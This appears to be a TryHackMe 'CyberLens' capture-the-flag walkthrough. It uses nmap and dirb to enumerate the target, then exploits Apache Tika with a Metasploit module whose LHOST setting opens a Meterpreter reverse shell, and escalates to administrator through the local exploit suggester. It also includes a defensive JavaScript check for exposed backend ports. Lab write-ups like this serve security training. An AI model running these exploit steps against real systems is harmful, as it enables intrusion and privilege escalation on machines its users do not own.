CyberLens – TryHackMe Walkthrough

This CTF challenge is rated as “easy” and is estimated to take around 120 minutes to complete. However, due to its intriguing mix of challenges, it took a little longer in my experience.

Update /etc/hosts:

Add the target IP to your /etc/hosts file to make navigation easier.

echo '10.10.81.123 cyberlens.thm' | sudo tee -a /etc/hosts

VM Startup Time:

Wait at least 5 minutes after starting the VM to ensure all services are fully operational.

Step 1: Enumeration

Start with an nmap scan to identify open ports and services:

nmap -sVC -T5 cyberlens.thm        

Key Findings:

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.57 ((Win64))
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services        

Step 2: Exploring the Web Server

Visit http://cyberlens.thm in your browser (the scan shows plain HTTP on port 80). Simultaneously, run a directory brute-forcing tool like dirb to uncover hidden paths:

dirb http://cyberlens.thm

We now have two important links to check.

Step 3: Analyzing the Image Extractor

While exploring the Image Extractor, clicking the "Get Metadata" button triggers a suspicious request that points to an uncommon port. We can capture it with the browser's developer tools: open the Network tab and upload an image. The request goes to cyberlens.thm:61777.
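Seen from the defender's side, the finding above is a backend service address hard-coded in client-side code. The following is an added example, not code from the room or the original post: a small audit that scans page source for absolute URLs on ports outside an allowlist. The sample markup, the element id, the `/meta` path and the allowlist are constructed assumptions.

```javascript
// Ports a browser is expected to reach on this site (assumption for the example).
const ALLOWED_PORTS = new Set(["80", "443"]);
const DEFAULT_PORT = { "http:": "80", "https:": "443" };

// Return every host:port referenced by an absolute http(s) URL in `source`
// whose port is outside the allowlist, with the paths seen for it.
function findExposedBackends(source, allowedPorts = ALLOWED_PORTS) {
  const urlPattern = /https?:\/\/[^\s"'`<>)\\]+/g;
  const findings = new Map();
  for (const raw of source.match(urlPattern) || []) {
    let url;
    try {
      url = new URL(raw);
    } catch {
      continue; // not a parseable URL, e.g. a template fragment
    }
    // URL.port is "" when the scheme's default port is used.
    const port = url.port || DEFAULT_PORT[url.protocol];
    if (allowedPorts.has(port)) continue;
    const key = `${url.hostname}:${port}`;
    if (!findings.has(key)) {
      findings.set(key, { host: url.hostname, port, paths: new Set() });
    }
    findings.get(key).paths.add(url.pathname);
  }
  return [...findings.values()].map(f => ({ ...f, paths: [...f.paths].sort() }));
}

// Constructed sample page source (not copied from the target).
const SAMPLE_PAGE = `
<link rel="stylesheet" href="https://fonts.example/css?family=Inter">
<script>
  document.getElementById("metadataButton").addEventListener("click", () => {
    fetch("http://cyberlens.thm:61777/meta", { method: "PUT", body: file })
      .then(r => r.json()).then(show);
  });
  const about = "http://cyberlens.thm:80/about.html";
</script>`;

function auditSample() {
  return findExposedBackends(SAMPLE_PAGE);
}

console.log(auditSample());
```

Any hit is a service that should sit behind the web server or a reverse proxy instead of being reachable directly from the browser.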

Step 4: Exploiting the Vulnerability

Apache Tika Exploit

The Image Extractor leads us to Apache Tika, which is vulnerable to specific exploits. Let's search for Apache Tika on Metasploit.

Now, configure and execute the exploit:

use exploit/windows/http/apache_tika_jp2_jscript
set RHOSTS 10.10.81.123
set RPORT 61777
set LHOST 10.17.87.86
set LPORT 4444
exploit        

Result: a Meterpreter session is opened successfully.

Step 5: Capturing the User Flag

Inside the Meterpreter shell, navigate to the user’s desktop and retrieve the first flag:

cd C:\\Users\\CyberLens\\Desktop
cat user_flag.txt        

Step 6: Admin Access

Now we will go back to msfconsole and search for the local exploit suggester.

msf6 exploit(windows/http/apache_tika_jp2_jscript) > search local exploit suggester        

Now we will open the module options and set SESSION to our running session. To see the running sessions, just type sessions; then set SESSION to that session ID and run.

We will now see some results. We are going to use the first one for our exploitation.

Set all the settings and run.

Bingo, we got admin privileges. We just need to go to the C:\\Users\\Administrator\\Desktop directory to get the final (admin) flag.
